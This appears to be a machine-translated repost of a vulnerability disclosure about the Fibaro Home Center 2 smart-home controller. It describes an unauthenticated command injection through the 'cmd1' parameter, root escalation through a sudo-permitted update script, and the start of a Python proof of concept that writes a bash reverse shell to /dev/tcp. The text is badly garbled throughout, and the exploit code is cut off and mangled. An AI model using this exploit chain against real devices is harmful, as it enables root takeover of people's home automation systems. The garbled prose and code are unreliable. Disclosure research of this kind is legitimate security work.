For Fibaro home center regulation device of the remote executable command flaws vulnerability oday studies-vulnerability and early warning-the black bar safety net

ID MYHACK58:62201789528
Type myhack58
Reporter 佚名
Modified 2017-09-29T00:00:00


In my everyday ordinary su interest of time, I match the hobby to discuss some of the smart home and Internet of things equipment the coherence of hardware and software. Recently this period of time, I was known in the workshops of the equipment the adoption of network security solutions. In my research process, I for intelligent home controller to stop the network security elucidating it. This controller can be perhaps a smart-home equipment of the brain, if the intrusion the attacker can perhaps win to obtain this components the smart home controller of the visit permission, then they will be able to perhaps complete reception of the smart home equipment. In get seminar declared later, my first time to the open source guises Domoticz open staff reported this to the Department flaws. Open up the staff at get flaws information after the agile fix up a coherent results, and I personally also submitted a number of flaws to fix code: 1. Httponly flag 2. (Britain at the end of certification theSQL injectionwith the buffer overflow flaws 3. (Britain at the end of the authentication of the long-distance order fulfillment flaws by Domoticz open up the staff to fix Went straight to the theme Elucidating the completion of this open source product later, I'm figuring on a trade product to stop the discussion. I alternative product in the this in a is the Fibaro home middle of the town. In this discussion process, I invented a very serious network security flaws, and the flaws of presence means that regardless of whether the second generation of the Fibaro home in the middle of the governance equipment of the Web interface can be visited, feel free to rate sexual intrusion the attacker can perhaps apply the flaws the complete reception of the root visit the right to this equipment. In the above demo video, I give everyone demonstrates how to invade a second-generation Fibaro home intermediate governance in equipment: Discuss process I went from a worked over there and borrowed a second-generation Fibaro home intermediate governance equipment(hereinafter referred to as Fibaro HC2, the grateful dear Martijn Teelen it! In fact, the Fibaro HC2 is a licensed rich surface of an x86 computer, its operating system running on a USB-memory which, while the Fibaro HC2 of the other USB memory is used as System 规复 application. ! When I open the equipment's housing, I created a USB memory Fibaro HC2 in the disk image. The next is to witness the cause of the moment, I'm on the Fibaro HC2 of the external system, elucidating the disk image to stop the in-depth elucidating, and figure out its whole running mechanism, and then Victory in the Fibaro HC2 in the invention have a serious network security flaws. ! With the equipment the Web interface of the coherence of the PHP file which code only the application of the ionCube stop sector encryption, in the stop period of time of the plundered later, I found a can probably easily decrypt the PHP file of the object. Decryption implemented later, I invented a named“liliSetDeviceCommand.php”file this file hard application of the POST-input value to perform a PHP system diversion, but the whole process of which it is neither the user stops the authentication, it will not output the value of the validity of the stop verification. ! In order to figure out the flaws can be a may perhaps the application's flaws, I to this in the“cmd1”parameter into the'ping${IFS}': the ! We can perhaps from htop(Linux under an interactive process to check the performance of the information know to us, once victory has injected just the order of: ! In this case we're ever can be and perhaps determine that, we can perhaps apply the flaws to achieve order fulfillment. However, since we here is necessary to the injected Payload in the application of quotation marks to is the www-data user to this identity still be subject to certain permissions defined. Permissions promotion In the/etc/sudoers file to stop elucidating later, I invented the www-data user can actually perhaps with root privileges to fulfill a small sector code: ! Please note that on the figure in the“/usr/bin/update”the source code, in this code stopped elucidating later, I invention, it can perhaps be used to“manually”device update French and. In order to achieve the“manual update”, where necessary via a process informed one. tar. gz file to the misappropriation of this Department the source code. Inform the the past. tar. gz file is necessary to include a“”the script, and the script files necessary to include for the performance of the update to manipulate the moderation edict(for example, copy files, etc. to manipulate it. So, let's preparatory quiz test in this run. sh script file registered in a reverse shell, but we really can perhaps get a licensed root permissions reverse shell? Britain at the end of a period of time of the manual test later, let's blatant victory! Write the flaws in the application code We in a short time within the agile prepared a report can perhaps be the long distance code to fulfil flaws and permission to promotion of flaws together with the application of the PoC code given above is our flaws in the application code that is already in the second generation of the Fibaro home intermediate governance equipment on test victory: the

!/ usr/bin/python

import requests import argparse import urllib import base64 import tarfile import os

parser = argparse. ArgumentParser(description='Fibaro RCE') parser. add_argument('--rhost') parser. add_argument('--lhost') parser. add_argument('--lport') args = parser. parse_args()

f = open('', 'w') f. write('#!/ bin/bash\n') f. write('/bin/bash-i >& /dev/tcp/' + args. lhost + '/' + args. lport + '0>&1\n')

[1] [2] next